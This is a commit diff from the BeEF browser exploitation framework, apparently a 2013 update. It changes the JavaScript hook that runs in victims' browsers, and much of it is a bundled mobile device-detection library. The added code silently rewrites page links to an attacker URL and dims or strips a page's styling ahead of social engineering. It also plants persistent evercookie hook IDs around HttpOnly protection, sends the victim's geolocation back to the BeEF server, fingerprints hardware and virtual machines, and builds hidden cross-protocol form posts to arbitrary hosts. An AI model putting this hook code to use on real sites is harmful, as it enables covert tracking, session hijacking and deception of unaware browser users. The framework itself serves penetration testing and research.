# See the file 'doc/COPYING' for copying permission
#

2
core/hbmanager.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/loader.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

37
core/main/client/are.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -9,8 +9,39 @@ beef.are = {
var Jools = require('jools');
this.ruleEngine = new Jools();
},
rules:[],
send:function(module){
// there will probably be some other stuff here before things are finished
this.commands.push(module);
},
execute:function(inputs){
this.rulesEngine.execute(input);
},
cache_modules:function(modules){},
rules:[
{
'name':"exec_no_input",
'condition':function(command,browser){
//need to figure out how to handle the inputs
return (!command['inputs'] || command['inputs'].length == 0)
},
'consequence':function(command,browser){}
},
{
'name':"module_has_sibling",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
},
{
'name':"module_depends_on_module",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
}
],
commands:[],
results:[]
};
beef.regCmp("beef.are");
beef.regCmp("beef.are");

18
core/main/client/beef.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components.
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (!<%= @client_debug %>) return;
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.

2935
core/main/client/browser.js
View File

File diff suppressed because it is too large Load Diff

2
core/main/client/browser/cookie.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

2
core/main/client/browser/popup.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

169
core/main/client/dom.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -76,6 +76,30 @@ beef.dom = {
return iframe;
},
/**
* Returns the highest current z-index
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
* @return: {Integer} Highest z-index in the DOM
* OR
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/**
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
var form_action = params['src'];
params['src'] = '';
}
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
}
});
},
/**
* Load a full screen div that is black, or, transparent
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -178,6 +278,23 @@ beef.dom = {
}).length;
},
/**
* Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
* http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
* @param: {String} url: the url to be rewritten
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksClickEvents: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).click(function() {this.href=url});
}
}).length;
},
/**
* Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
* @param: {String} old_protocol: the old link protocol to be rewritten
@@ -267,7 +384,8 @@ beef.dom = {
if (codebase != null) {
content += "<param name='codebase' value='" + codebase + "' />"
}else{
}
if (archive != null){
content += "<param name='archive' value='" + archive + "' />";
}
if (params != null) {
@@ -275,7 +393,7 @@ beef.dom = {
}
content += "</object>";
}
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
@@ -294,24 +412,25 @@ beef.dom = {
}
content += "</applet>";
}
if (beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "</embed>";
}
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
//
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "</embed>";
// }
$j('body').append(content);
},
@@ -358,11 +477,11 @@ beef.dom = {
* @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, commands){
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');

2
core/main/client/encode/base64.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

2
core/main/client/encode/json.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

12
core/main/client/geolocation.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({
error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error");
beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success");
beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code);
beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:

123
core/main/client/hardware.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -7,39 +7,51 @@
beef.hardware = {
ua: navigator.userAgent,
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
cpuType: function() {
// IE
if (typeof navigator.cpuClass != 'undefined') {
cpu = navigator.cpuClass;
if (cpu == "x86") return "32-bit";
if (cpu == "68K") return "Motorola 68K";
if (cpu == "PPC") return "Motorola PPC";
if (cpu == "Alpha") return "Digital";
if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
if (this.ua.match('Win64; x64')) return "64-bit (AMD)";
// Firefox
} else if (typeof navigator.oscpu != 'undefined') {
if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
}
if (navigator.platform.toLowerCase() == "win64") return "64-bit";
return "32-bit";
},
isIpad: function() {
return (this.ua.indexOf('iPad') != -1) ? true : false;
isTouchEnabled: function() {
if ('ontouchstart' in document) return true;
return false;
},
isIpod: function() {
return (this.ua.indexOf('iPod') != -1) ? true : false;
isVirtualMachine: function() {
if (screen.width % 2 || screen.height % 2) return true;
return false;
},
isLaptop: function() {
// Most common laptop screen resolution
if (screen.width == 1366 && screen.height == 768) return true;
// Netbooks
if (screen.width == 1024 && screen.height == 600) return true;
return false;
},
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
isBlackBerry: function() {
return (this.ua.match('BlackBerry')) ? true : false;
},
isZune: function() {
return (this.ua.match('ZuneWP7')) ? true : false;
},
isKindle: function() {
return (this.ua.match('Kindle')) ? true : false;
},
isHtc: function() {
return (this.ua.match('HTC')) ? true : false;
},
@@ -48,10 +60,6 @@ beef.hardware = {
return (this.ua.match('Ericsson')) ? true : false;
},
isNokia: function() {
return (this.ua.match('Nokia')) ? true : false;
},
isMotorola: function() {
return (this.ua.match('Motorola')) ? true : false;
},
@@ -60,23 +68,62 @@ beef.hardware = {
return (this.ua.match('Nexus One')) ? true : false;
},
getName: function() {
/**
* Returns true if the browser is on a Mobile Phone
* @return: {Boolean} true or false
*
* @example: if(beef.hardware.isMobilePhone()) { ... }
**/
isMobilePhone: function() {
return DetectMobileQuick();
},
if (this.isNokia()) return 'Nokia';
if (this.isWinPhone()) return 'Windows Phone';
if (this.isBlackBerry()) return 'BlackBerry';
if (this.isIphone()) return 'iPhone';
if (this.isIpad()) return 'iPad';
if (this.isIpod()) return 'iPod';
if (this.isKindle()) return 'Kindle';
if (this.isHtc()) return 'HTC';
if (this.isMotorola()) return 'Motorola';
if (this.isZune()) return 'Zune';
if (this.isGoogle()) return 'Google';
if (this.isEricsson()) return 'Ericsson';
getName: function() {
var ua = navigator.userAgent.toLowerCase();
if(DetectIphone()) { return "iPhone"};
if(DetectIpod()) { return "iPod Touch"};
if(DetectIpad()) { return "iPad"};
if (this.isHtc()) { return 'HTC'};
if (this.isMotorola()) { return 'Motorola'};
if (this.isZune()) { return 'Zune'};
if (this.isGoogle()) { return 'Google Nexus One'};
if (this.isEricsson()) { return 'Ericsson'};
if(DetectAndroidPhone()) { return "Android Phone"};
if(DetectAndroidTablet()) { return "Android Tablet"};
if(DetectS60OssBrowser()) { return "Nokia S60 Open Source"};
if(ua.search(deviceS60) > -1) { return "Nokia S60"};
if(ua.search(deviceS70) > -1) { return "Nokia S70"};
if(ua.search(deviceS80) > -1) { return "Nokia S80"};
if(ua.search(deviceS90) > -1) { return "Nokia S90"};
if(ua.search(deviceSymbian) > -1) { return "Nokia Symbian"};
if (this.isNokia()) { return 'Nokia'};
if(DetectWindowsPhone7()) { return "Windows Phone 7"};
if(DetectWindowsMobile()) { return "Windows Mobile"};
if(DetectBlackBerryTablet()) { return "BlackBerry Tablet"};
if(DetectBlackBerryWebKit()) { return "BlackBerry OS 6"};
if(DetectBlackBerryTouch()) { return "BlackBerry Touch"};
if(DetectBlackBerryHigh()) { return "BlackBerry OS 5"};
if(DetectBlackBerry()) { return "BlackBerry"};
if(DetectPalmOS()) { return "Palm OS"};
if(DetectPalmWebOS()) { return "Palm Web OS"};
if(DetectGarminNuvifone()) { return "Gamin Nuvifone"};
if(DetectArchos()) { return "Archos"}
if(DetectBrewDevice()) { return "Brew"};
if(DetectDangerHiptop()) { return "Danger Hiptop"};
if(DetectMaemoTablet()) { return "Maemo Tablet"};
if(DetectSonyMylo()) { return "Sony Mylo"};
if(DetectAmazonSilk()) { return "Kindle Fire"};
if(DetectKindle()) { return "Kindle"};
if(DetectSonyPlaystation()) { return "Playstation"};
if(ua.search(deviceNintendoDs) > -1) { return "Nintendo DS"};
if(ua.search(deviceWii) > -1) { return "Nintendo Wii"};
if(ua.search(deviceNintendo) > -1) { return "Nintendo"};
if(DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}
};
beef.regCmp('beef.net.hardware');
beef.regCmp('beef.hardware');

9
core/main/client/init.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -13,7 +13,8 @@
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*/
BEEFHOOK = beef.session.get_hook_session_id();
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message);
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
@@ -46,7 +47,7 @@ window.onclose = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message);
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}

1301
core/main/client/lib/deployJava.js Normal file
View File

File diff suppressed because it is too large Load Diff

23
core/main/client/lib/evercookie.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
this.evercookie_cookie = function(name, value)
{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
try{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};
// get value from param-like string (eg, "x=y&name=VALUE")

706
core/main/client/lib/mdetect.js Normal file
View File

@@ -0,0 +1,706 @@
/* *******************************************
// Copyright 2010-2012, Anthony Hand
// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
// LICENSE INFORMATION
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
// either express or implied. See the License for the specific
// language governing permissions and limitations under the License.
// *******************************************
*/
var isIphone = false;
var isAndroidPhone = false;
var isTierTablet = false;
var isTierIphone = false;
var isTierRichCss = false;
var isTierGenericMobile = false;
var engineWebKit = "webkit";
var deviceIphone = "iphone";
var deviceIpod = "ipod";
var deviceIpad = "ipad";
var deviceMacPpc = "macintosh"; //Used for disambiguation
var deviceAndroid = "android";
var deviceGoogleTV = "googletv";
var deviceXoom = "xoom"; //Motorola Xoom
var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
var deviceSymbian = "symbian";
var deviceS60 = "series60";
var deviceS70 = "series70";
var deviceS80 = "series80";
var deviceS90 = "series90";
var deviceWinPhone7 = "windows phone os 7";
var deviceWinMob = "windows ce";
var deviceWindows = "windows";
var deviceIeMob = "iemobile";
var devicePpc = "ppc"; //Stands for PocketPC
var enginePie = "wm5 pie"; //An old Windows Mobile
var deviceBB = "blackberry";
var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
var deviceBBStorm = "blackberry95"; //Storm 1 and 2
var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
var deviceBBTour = "blackberry96"; //Tour
var deviceBBCurve = "blackberry89"; //Curve 2
var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
var deviceBBTorch = "blackberry 98"; //Torch
var deviceBBPlaybook = "playbook"; //PlayBook tablet
var devicePalm = "palm";
var deviceWebOS = "webos"; //For Palm's line of WebOS devices
var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
var engineBlazer = "blazer"; //Old Palm browser
var engineXiino = "xiino";
var deviceKindle = "kindle"; //Amazon Kindle, eInk one
var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
var vndwap = "vnd.wap";
var wml = "wml";
var deviceTablet = "tablet"; //Generic term for slate and tablet devices
var deviceBrew = "brew";
var deviceDanger = "danger";
var deviceHiptop = "hiptop";
var devicePlaystation = "playstation";
var deviceNintendoDs = "nitro";
var deviceNintendo = "nintendo";
var deviceWii = "wii";
var deviceXbox = "xbox";
var deviceArchos = "archos";
var engineOpera = "opera"; //Popular browser
var engineNetfront = "netfront"; //Common embedded OS browser
var engineUpBrowser = "up.browser"; //common on some phones
var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
var deviceMidp = "midp"; //a mobile Java technology
var uplink = "up.link";
var engineTelecaQ = 'teleca q'; //a modern feature phone browser
var devicePda = "pda";
var mini = "mini"; //Some mobile browsers put 'mini' in their names.
var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
var maemo = "maemo";
var linux = "linux";
var qtembedded = "qt embedded"; //for Sony Mylo and others
var mylocom2 = "com2"; //for Sony Mylo also
var manuSonyEricsson = "sonyericsson";
var manuericsson = "ericsson";
var manuSamsung1 = "sec-sgh";
var manuSony = "sony";
var manuHtc = "htc"; //Popular Android and WinMo manufacturer
var svcDocomo = "docomo";
var svcKddi = "kddi";
var svcVodafone = "vodafone";
var disUpdate = "update"; //pda vs. update
var uagent = "";
if (navigator && navigator.userAgent)
uagent = navigator.userAgent.toLowerCase();
function DetectIphone()
{
if (uagent.search(deviceIphone) > -1)
{
if (DetectIpad() || DetectIpod())
return false;
else
return true;
}
else
return false;
}
function DetectIpod()
{
if (uagent.search(deviceIpod) > -1)
return true;
else
return false;
}
function DetectIpad()
{
if (uagent.search(deviceIpad) > -1 && DetectWebkit())
return true;
else
return false;
}
function DetectIphoneOrIpod()
{
if (uagent.search(deviceIphone) > -1 ||
uagent.search(deviceIpod) > -1)
return true;
else
return false;
}
function DetectIos()
{
if (DetectIphoneOrIpod() || DetectIpad())
return true;
else
return false;
}
function DetectAndroid()
{
if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
return true;
if (uagent.search(deviceHtcFlyer) > -1)
return true;
else
return false;
}
function DetectAndroidPhone()
{
if (DetectAndroid() && (uagent.search(mobile) > -1))
return true;
if (DetectOperaAndroidPhone())
return true;
if (uagent.search(deviceHtcFlyer) > -1)
return true;
else
return false;
}
function DetectAndroidTablet()
{
if (!DetectAndroid())
return false;
if (DetectOperaMobile())
return false;
if (uagent.search(deviceHtcFlyer) > -1)
return false;
if (uagent.search(mobile) > -1)
return false;
else
return true;
}
function DetectAndroidWebKit()
{
if (DetectAndroid() && DetectWebkit())
return true;
else
return false;
}
function DetectGoogleTV()
{
if (uagent.search(deviceGoogleTV) > -1)
return true;
else
return false;
}
function DetectWebkit()
{
if (uagent.search(engineWebKit) > -1)
return true;
else
return false;
}
function DetectS60OssBrowser()
{
if (DetectWebkit())
{
if ((uagent.search(deviceS60) > -1 ||
uagent.search(deviceSymbian) > -1))
return true;
else
return false;
}
else
return false;
}
function DetectSymbianOS()
{
if (uagent.search(deviceSymbian) > -1 ||
uagent.search(deviceS60) > -1 ||
uagent.search(deviceS70) > -1 ||
uagent.search(deviceS80) > -1 ||
uagent.search(deviceS90) > -1)
return true;
else
return false;
}
function DetectWindowsPhone7()
{
if (uagent.search(deviceWinPhone7) > -1)
return true;
else
return false;
}
function DetectWindowsMobile()
{
if (DetectWindowsPhone7())
return false;
if (uagent.search(deviceWinMob) > -1 ||
uagent.search(deviceIeMob) > -1 ||
uagent.search(enginePie) > -1)
return true;
if ((uagent.search(devicePpc) > -1) &&
!(uagent.search(deviceMacPpc) > -1))
return true;
if (uagent.search(manuHtc) > -1 &&
uagent.search(deviceWindows) > -1)
return true;
else
return false;
}
function DetectBlackBerry()
{
if (uagent.search(deviceBB) > -1)
return true;
if (uagent.search(vndRIM) > -1)
return true;
else
return false;
}
function DetectBlackBerryTablet()
{
if (uagent.search(deviceBBPlaybook) > -1)
return true;
else
return false;
}
function DetectBlackBerryWebKit()
{
if (DetectBlackBerry() &&
uagent.search(engineWebKit) > -1)
return true;
else
return false;
}
function DetectBlackBerryTouch()
{
if (DetectBlackBerry() &&
((uagent.search(deviceBBStorm) > -1) ||
(uagent.search(deviceBBTorch) > -1) ||
(uagent.search(deviceBBBoldTouch) > -1) ||
(uagent.search(deviceBBCurveTouch) > -1) ))
return true;
else
return false;
}
function DetectBlackBerryHigh()
{
if (DetectBlackBerryWebKit())
return false;
if (DetectBlackBerry())
{
if (DetectBlackBerryTouch() ||
uagent.search(deviceBBBold) > -1 ||
uagent.search(deviceBBTour) > -1 ||
uagent.search(deviceBBCurve) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectBlackBerryLow()
{
if (DetectBlackBerry())
{
if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
return false;
else
return true;
}
else
return false;
}
function DetectPalmOS()
{
if (uagent.search(devicePalm) > -1 ||
uagent.search(engineBlazer) > -1 ||
uagent.search(engineXiino) > -1)
{
if (DetectPalmWebOS())
return false;
else
return true;
}
else
return false;
}
function DetectPalmWebOS()
{
if (uagent.search(deviceWebOS) > -1)
return true;
else
return false;
}
function DetectWebOSTablet()
{
if (uagent.search(deviceWebOShp) > -1 &&
uagent.search(deviceTablet) > -1)
return true;
else
return false;
}
function DetectGarminNuvifone()
{
if (uagent.search(deviceNuvifone) > -1)
return true;
else
return false;
}
function DetectSmartphone()
{
if (DetectIphoneOrIpod()
|| DetectAndroidPhone()
|| DetectS60OssBrowser()
|| DetectSymbianOS()
|| DetectWindowsMobile()
|| DetectWindowsPhone7()
|| DetectBlackBerry()
|| DetectPalmWebOS()
|| DetectPalmOS()
|| DetectGarminNuvifone())
return true;
return false;
};
function DetectArchos()
{
if (uagent.search(deviceArchos) > -1)
return true;
else
return false;
}
function DetectBrewDevice()
{
if (uagent.search(deviceBrew) > -1)
return true;
else
return false;
}
function DetectDangerHiptop()
{
if (uagent.search(deviceDanger) > -1 ||
uagent.search(deviceHiptop) > -1)
return true;
else
return false;
}
function DetectMaemoTablet()
{
if (uagent.search(maemo) > -1)
return true;
if ((uagent.search(linux) > -1)
&& (uagent.search(deviceTablet) > -1)
&& !DetectWebOSTablet()
&& !DetectAndroid())
return true;
else
return false;
}
function DetectSonyMylo()
{
if (uagent.search(manuSony) > -1)
{
if (uagent.search(qtembedded) > -1 ||
uagent.search(mylocom2) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectOperaMobile()
{
if (uagent.search(engineOpera) > -1)
{
if (uagent.search(mini) > -1 ||
uagent.search(mobi) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectOperaAndroidPhone()
{
if ((uagent.search(engineOpera) > -1) &&
(uagent.search(deviceAndroid) > -1) &&
(uagent.search(mobi) > -1))
return true;
else
return false;
}
function DetectOperaAndroidTablet()
{
if ((uagent.search(engineOpera) > -1) &&
(uagent.search(deviceAndroid) > -1) &&
(uagent.search(deviceTablet) > -1))
return true;
else
return false;
}
function DetectSonyPlaystation()
{
if (uagent.search(devicePlaystation) > -1)
return true;
else
return false;
};
function DetectNintendo()
{
if (uagent.search(deviceNintendo) > -1 ||
uagent.search(deviceWii) > -1 ||
uagent.search(deviceNintendoDs) > -1)
return true;
else
